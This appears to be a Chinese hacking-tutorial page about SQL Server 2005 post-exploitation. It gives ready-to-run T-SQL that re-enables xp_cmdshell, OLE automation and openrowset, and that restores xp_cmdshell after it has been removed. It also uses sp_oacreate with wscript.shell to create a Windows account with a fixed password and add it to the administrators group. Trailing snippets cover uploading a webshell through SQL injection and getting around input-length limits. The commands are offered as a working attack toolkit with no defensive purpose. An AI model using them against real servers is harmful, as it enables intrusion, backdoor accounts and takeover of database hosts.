sql server 2005下開啟xp_cmdshell的辦法
以下是引用片段:
exec sp_configure 』show advanced options』, 1;reconfigure;exec sp_configure 』xp_cmdshell』, 1;reconfigure;
sql2005開啟'openrowset'支援的方法:
以下是引用片段:
exec sp_configure 』show advanced options』, 1;reconfigure;exec sp_configure 』ad hoc distributed queries』,1;reconfigure;
sql2005開啟'sp_oacreate'支援的方法:
以下是引用片段:
exec sp_configure 』show advanced options』, 1;reconfigure;exec sp_configure 』ole automation procedures』,1;reconfigure;
突破sa的各種困難, 常見情況恢復執行xp_cmdshell
1 未能找到儲存過程'master..xpcmdshell'.
恢復方法:查詢分離器連線後,
第一步執行:exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按f5鍵命令執行完畢
2 無法裝載 dll xpsql70.dll 或該dll所引用的某一 dll。原因126(找不到指定模組。)
恢復方法:查詢分離器連線後,
第一步執行:sp_dropextendedproc "xp_cmdshell"
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按f5鍵命令執行完畢
3 無法在庫 xpweb70.dll 中找到函式 xp_cmdshell。原因: 127(找不到指定的程式。)
恢復方法:查詢分離器連線後,
第一步執行:exec sp_dropextendedproc 'xp_cmdshell'
第二步執行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然後按f5鍵命令執行完畢
4.終極方法.
如果以上方法均不可恢復,請嘗試用下面的辦法直接新增帳戶:
查詢分離器連線後,
2000servser系統:
以下是引用片段:
declare @shell int exec sp_oacreate 』wscript.shell』,@shell output exec sp_oamethod @shell,』run』,null,』c:/winnt/system32/cmd.exe /c net user dell huxifeng007 /add』
declare @shell int exec sp_oacreate 』wscript.shell』,@shell output exec sp_oamethod @shell,』run』,null,』c:/winnt/system32/cmd.exe /c net localgroup administrators dell /add』
xp或2003server系統:
以下是引用片段:
declare @shell int exec sp_oacreate 』wscript.shell』,@shell output exec sp_oamethod @shell,』run』,null,』c:/windows/system32/cmd.exe /c net user dell huxifeng007 /add』
declare @shell int exec sp_oacreate 』wscript.shell』,@shell output exec sp_oamethod @shell,』run』,null,』c:/windows/system32/cmd.exe /c net localgroup administrators dell /add』
突破SQL錯誤提示上傳webshell
得到sql注入點,首先想到的是backup webshell,扔在nb裡跑一圈,發現遮蔽了sql錯誤資訊,得不到物理路徑,那還寫個pp馬了.聯想到乙個許可權不是很高的命令openrowset,進行跨庫伺服器查詢,就是把乙個sql命令傳送到遠端資料庫,然後看返回的結果,但是要啟動事件跟蹤 我們可以把 ...
難忘的突破!
遇到乙個對自己來說的難題 tinvestmoney 這個函式無法找到函式體 1 首先我用了開發環境來全域性搜尋 用了乙個notepad 沒找到。擔心它查詢能力有問題漏掉了。這個方法我加重 用了dreamwearcs6全域性搜尋還是不行 還是覺得可能會漏掉 又用了sublime text2還 是沒找到...
突破SQL注入時輸入框長度的限制
end 用法 先把len.reg匯入登錄檔 注意檔案路徑 然後把len.htm拷到登錄檔中指定的地方.開啟網頁,游標放在要改變長度的輸入框上點右鍵,看多了乙個叫擴充套件的選項了吧 單擊搞定 後記 同樣的也就可以對付那些限制輸入內容的指令碼了.附 防止本地提交的asp response.write 你...